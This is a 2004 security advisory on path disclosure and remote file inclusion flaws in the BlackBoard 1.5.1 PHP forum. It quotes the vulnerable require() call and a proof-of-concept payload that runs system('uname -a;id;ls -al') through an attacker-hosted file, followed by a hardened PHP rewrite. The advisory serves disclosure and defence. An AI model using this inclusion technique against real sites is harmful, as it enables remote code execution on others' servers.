[UNIX] BlackBoard Path Disclosure and File Inclusion Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 11 Oct 2004 19:16:48 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
BlackBoard Path Disclosure and File Inclusion Vulnerabilities
BlackBoard <http://blackboard.unclassified.de/> is "an open-source,
PHP-based internet bulletin board software, almost like any other around".
Two vulnerabilities have been discovered in BlackBoard: a path disclosure
vulnerability and a file inclusion vulnerability. The file inclusion
vulnerability makes it possible to cause the remote site to execute arbitrary
code; the path disclosure vulnerability makes it possible to discover the
true path under which the product has been installed.
* BlackBoard version 1.5.1
By requesting the following file it is possible to retrieve the actual
path under which the BlackBoard product is installed:
The response would look like:
Warning: main(lang/_more.php): failed to open stream: No such file or
directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
Fatal error: main(): Failed opening required 'lang/_more.php'
/www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
The same issue also occurs in admin.inc.php, cp.inc.php and others.
The /bb_lib/admin.inc.php file incorrectly uses the following unsanitized
require call:
require($libpath . 'lang/' . $LANG . '_more.php');
This means that anyone who can set the libpath parameter can point it at
whichever file they desire, causing the inclusion of arbitrary files.
Create a file called _more.php on your web site with the following
system("uname -a;id;ls -al");
Then issue a request of the sorts of, to cause it to get included and
The vendor has issued a patch that addresses these issues.
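As an added example (not BlackBoard's code and not the vendor's patch), the following PHP shows how the require() quoted above could be rewritten so that neither $libpath nor $LANG can pull in an attacker-chosen file, and so that a bad request no longer leaks the install path. The pinned library path, the allowlisted language codes and the file layout are assumptions.

```php
<?php
// Added example (not BlackBoard's code and not the vendor's patch): a
// hardened replacement for the require() call quoted from
// bb_lib/admin.inc.php. Assumptions: the library path is fixed server-side,
// $LANG may be attacker-controlled, and language files live under
// <libpath>/lang/<code>_more.php. The language list is constructed.

// Keep PHP warnings (which carry filesystem paths) out of HTTP responses.
ini_set('display_errors', '0');

// Pin the library path; never let request data (e.g. a libpath parameter
// imported via register_globals) decide where code is loaded from.
define('BB_LIBPATH', __DIR__ . '/bb_lib/');

// Exact allowlist of language codes shipped with the install.
const BB_ALLOWED_LANGS = ['english', 'german'];

/**
 * Resolve the language file for $lang. Returns the absolute path, or null
 * when $lang is not an allowed code or the resolved file is outside lang/.
 */
function bb_lang_file(string $lang): ?string
{
    // Exact allowlist match rejects traversal, URLs, NUL bytes and anything
    // else that is not one of the known codes.
    if (!in_array($lang, BB_ALLOWED_LANGS, true)) {
        return null;
    }
    $langDir = realpath(BB_LIBPATH . 'lang');
    $file    = realpath(BB_LIBPATH . 'lang/' . $lang . '_more.php');
    // realpath() is false for missing files; the prefix check is defence in
    // depth should the allowlist ever be widened carelessly.
    if ($langDir === false || $file === false
        || strncmp($file, $langDir . DIRECTORY_SEPARATOR, strlen($langDir) + 1) !== 0) {
        return null;
    }
    return $file;
}

$LANG = $_GET['LANG'] ?? 'english';
$file = bb_lang_file($LANG);
if ($file === null) {
    // Fail closed without echoing a filesystem path: the original
    // require() leaked the install directory in its PHP warning.
    http_response_code(400);
    exit('Unsupported language');
}
require $file;
```

Run from the CLI with no bb_lib/lang directory present, the script simply answers "Unsupported language" instead of a warning that names the install path.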
The information has been provided by <mailto:Cracklove@gmail.com> Lin